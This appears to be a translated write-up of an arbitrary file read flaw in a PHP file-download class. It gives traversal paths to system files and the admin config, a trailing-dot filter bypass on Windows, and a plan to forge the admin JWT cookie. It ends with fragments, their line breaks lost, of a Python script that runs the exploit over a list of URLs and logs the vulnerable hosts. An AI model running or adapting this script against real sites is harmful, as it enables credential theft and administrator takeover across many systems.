Modify the path to construct any file to read, “./“ represents the current directory, and can read the database configuration file, current administrator account password, etc.
This is a code for class download in the PHP namespace Ue\tools. This class provides a static method download for downloading files. The method accepts two parameters: $filename represents the path of the file to be downloaded, $downLoadName represents the file name saved during downloading (optional, defaults to the original file name). The main logic of this method is as follows:
First check whether $downLoadName is empty, and if it is empty, set it to $filename.
Check whether $filename contains ., if not, return false, indicating that the file type cannot be determined.
Set the response MIME type to application/octet-stream, which represents a common binary file type.
Use the fopen function to open the file in read-only mode, and read the contents of the file through the fread function.
Close the file handle.
Determine whether the client’s HTTP_USER_AGENT contains “MSIE”. If so, set a series of response header information, including Content-Type, Content-Disposition, etc., to support downloading files in the IE browser.
If it is not an IE browser, set another set of response header information.
Finally, use the exit function to output the file content and end the execution of the script.
The current build environment is a Windows system and check whether $filename contains “.”, so try to read the win.ini file
C:\Windows\win.ini
Try to read the hosts file and check “.” so add “.” after the hosts file.
The principle is that the Windows system deletes the “.” and spaces in the file suffix by default. If the back-end filtering of the website does not include the dot at the end of the filter, it can be bypassed.
C:\Windows\System32\drivers\etc\hosts.
Try to read files under linux system
/etc/resolv.conf
Read any file in the foreground
Try to expand the harm and upgrade the vulnerability
Observe that admcookies in the Cookie field is encrypted by jwt and try to decrypt it.
JWT (JSON Web Token) is an open standard for authentication and authorization. It consists of three parts: header, payload and signature.
In the given code, the parameters of the JWT are generated as follows:
Header: Use algorithm HS256 (HMAC SHA-256) to generate a signature, represented in the code as ‘alg’ => ‘HS256’.
Payload: Contains some declaration information and can be customized as needed. In the code, the payload contains the following fields:
iat: indicates the issuance time, use the time() function to obtain the current time.
iss: Indicates the issuer of the JWT.
exp: indicates the expiration time, the current time plus 24 hours.
nbf: The Token will not be processed before this time.
sub: indicates the user targeted, defaulting to the currently requested domain name.
jti: represents the unique identifier of the Token, generated using md5(uniqid(‘JWT’) . time()).
claim: represents custom data, which can be set as needed.
Signature: Use the key to generate signatures for the header and payload. The signature algorithm uses HS256 and is implemented by calling the self::signature() method.
Finally, the JWT Token is formed by splicing the base64-encoded header, payload and signature together and separating them with “.”.
file = requests.get(f"{url}/admin/download?path=./config/admin.php", headers=headers, data=data, allow_redirects=False, verify=False) if "管理员配置" in file.text: vulnerable_urls.append(url) print(url,file.text) with open('存在漏洞.txt', 'w') as file: for vul_url in vulnerable_urls: file.write(vul_url + '\n')
with open('url.txt') as file: for url in file: url = url.strip() session_id = get_session_id(url) if session_id: token = generate_payload(url) exploit_vulnerability(url, session_id, token)
